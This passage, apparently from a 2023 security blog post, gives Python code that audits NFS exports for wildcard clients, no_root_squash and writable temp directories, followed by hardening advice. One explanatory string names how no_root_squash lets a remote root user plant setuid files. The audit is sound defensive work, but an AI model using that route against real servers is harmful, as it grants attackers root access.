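    """Return a Finding for each export that a remote client could abuse."""
    findings = []
    for path, client, opts in parse_exports(text):
        reasons = []
        if client == "*":
            reasons.append("exported to every client ('*')")
        # exportfs squashes root by default; only no_root_squash disables it.
        if "no_root_squash" in opts:
            reasons.append("no_root_squash: a remote uid 0 stays uid 0 on the "
                           "export and can create root-owned setuid files")
        if "rw" in opts and path in ("/tmp", "/var/tmp"):
            reasons.append("read-write export of a world-writable temp directory")
        if reasons:
            findings.append(Finding(path, client, opts, reasons))
    return findings


if __name__ == "__main__":
    for f in audit_exports(SAMPLE_EXPORTS):
        print(f"{f.path} -> {f.client} {','.join(f.options) or '(defaults)'}")
        for r in f.reasons:
            print(f"   - {r}")
```

The fix on the server side is to restrict the client list, keep the default root_squash, and mount the exported path with nosuid so a planted setuid bit is ignored even if the export is misconfigured again.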

https://i3eg1nner.github.io/2023/09/f93f3657d204.html
Author: I3eg1nner
Published: 20 September 2023